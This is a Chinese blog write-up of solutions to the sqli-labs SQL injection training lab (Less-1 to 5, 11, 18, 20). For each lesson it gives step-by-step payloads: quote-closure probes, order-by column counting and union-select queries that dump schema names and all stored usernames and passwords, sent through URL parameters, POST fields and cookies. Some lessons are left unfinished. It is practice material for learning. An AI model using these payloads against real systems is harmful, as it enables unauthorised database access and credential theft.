1. 首页
  2. 文章中心
  3. SQL注入

sqli-labs解题记录Page-1

181 阅读 0 评论
我是靠谱客的博主 雪白火,这篇文章主要介绍sqli-labs解题记录Page-1,现在分享给大家,希望可以做个参考。

题目序号

  • Page-1
    • Less-1
    • Less-2
    • Less-3
    • Less-4
    • Less-5
    • Less-11
    • Less-18
    • Less-20

Page-1

Less-1

1.进入第一题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知参数id的值被单引号包裹
在这里插入图片描述

4.构造?id=1' and '1'='1页面重新显示正常,由此判断出这题是单引号字符型注入
在这里插入图片描述

5.构造?id=1' order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1' order by 2 --+页面显示正常
在这里插入图片描述

构造?id=1' order by 3 --+页面显示正常
在这里插入图片描述

构造?id=1' order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

6.构造?id=-1' union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

7.构造?id=-1' union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

8.构造?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

9.构造?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

10.构造?id=-1' union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-2

1.进入第二题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知是单引号影响了SQL语句的闭合,由此判断出这题是数字型注入
在这里插入图片描述

4.构造?id=1 order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1 order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1 order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1 order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1 union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

6.构造?id=-1 union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

7.构造?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

8.构造?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

9.构造?id=-1 union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-3

1.进入第三题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知参数id的值被单引号和括号包裹
在这里插入图片描述

4.构造?id=1') order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1') order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1') order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1') order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1') union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

6.构造?id=-1') union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

7.构造?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

8.构造?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

9.构造?id=-1') union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-4

1.进入第四题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个双引号,显示语句出错,根据报错信息可以得知参数id的值被双引号和括号包裹
在这里插入图片描述

4.构造?id=1") order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1") order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1") order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1") order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1") union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

6.构造?id=-1") union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

7.构造?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

8.构造?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

9.构造?id=-1") union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-5

1.进入第五题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示You are in...........,不再像前4题显示namepassw
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知参数id的值被单引号包裹
在这里插入图片描述

4.构造?id=1‘ order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1' order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1' order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1' order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1' union select 1,2,3 --+判断回显点,结果发现行不通
在这里插入图片描述

6.要盲注,暂且不会

Less-11

1、进入第11题
在这里插入图片描述

2、先随便填点并抓个包,通过抓的包可以知道是POST提交
在这里插入图片描述
在这里插入图片描述

3、给passwd的值加个单引号后通过报错可以知道是通过单引号闭合的
在这里插入图片描述

4、通过order by测试出字段数为2
在这里插入图片描述
在这里插入图片描述

5、在passwd的值后面加上' and 1=2 union select 1,2--+测出回显点
在这里插入图片描述

6、在passwd的值后面加上' and 1=2 union select group_concat(username),group_concat(password) from users--+爆出所有账号密码
在这里插入图片描述

Less-18

1、打开18题
在这里插入图片描述

2、账号密码输入admin并抓个包,通过登录后的界面可以知道他获取了我们的User Agent,那么User Agent就有可能存在注入
在这里插入图片描述
在这里插入图片描述

3、

Less-20

1、进入第20题
在这里插入图片描述

2、先填入admin并抓个包,通过抓的包可以知道这里Cookie的值是进行过数据库操作的
在这里插入图片描述
在这里插入图片描述

3、在Cookie的值后面加个单引号,通过报错可以知道是通过单引号进行闭合的
在这里插入图片描述

4、通过order by测出字段数为3
在这里插入图片描述
在这里插入图片描述

5、在Cookie的值后面加上' and 1=2 union select 1,2,3--+判断出回显点
在这里插入图片描述

6、在Cookie的值后面加上' and 1=2 union select 1,group_concat(username),group_concat(password) from users--+爆出账号密码
在这里插入图片描述

最后

以上就是雪白火最近收集整理的关于sqli-labs解题记录Page-1的全部内容,更多相关sqli-labs解题记录Page-1内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(120)

相关文章

SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )Stacked QueriesLesson - 38Lesson - 39Lesson - 40Lesson - 41Lesson - 42Lesson - 43Lesson - 44Lesson - 45Lesson - 46Lesson - 47Lesson - 48Lesson - 49Lesson - 50Lesson - 51Lesson - 52Lesson - 53
SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )Stacked QueriesLesson - 38Lesson - 39Lesson - 40Lesson - 41Lesson - 42Lesson - 43Lesson - 44Lesson - 45Lesson - 46Lesson - 47Lesson - 48Lesson - 49Lesson - 50Lesson - 51Lesson - 52Lesson - 53
Sqli-labs ”1~10关“——宝典Sqli-labs 1~10关:
Sqli-labs ”1~10关“——宝典Sqli-labs 1~10关:
Sqli-labs 查看源代码 1-20Less-1:Less-2:Less-3:Less-4:Less-5:Less-6:Less-7:Less-8:Less-9:Less-10:Less-11:Less-12:Less-13:Less-14:Less-15:Less16:Less-17:Less-18:Less-19:Less-20:
Sqli-labs 查看源代码 1-20Less-1:Less-2:Less-3:Less-4:Less-5:Less-6:Less-7:Less-8:Less-9:Less-10:Less-11:Less-12:Less-13:Less-14:Less-15:Less16:Less-17:Less-18:Less-19:Less-20:
漏洞挖掘与防范(基础篇)SQL注入漏洞
漏洞挖掘与防范(基础篇)SQL注入漏洞
sqli-labs解题记录Page-1
sqli-labs解题记录Page-1
sqli-labs————less 25(绕or\and)Less-25
sqli-labs————less 25(绕or\and)Less-25
sqli_labs第一关
sqli_labs第一关
[sqli-labs]Less1~22答案
[sqli-labs]Less1~22答案

评论列表共有 0 条评论

立即
投稿
返回
顶部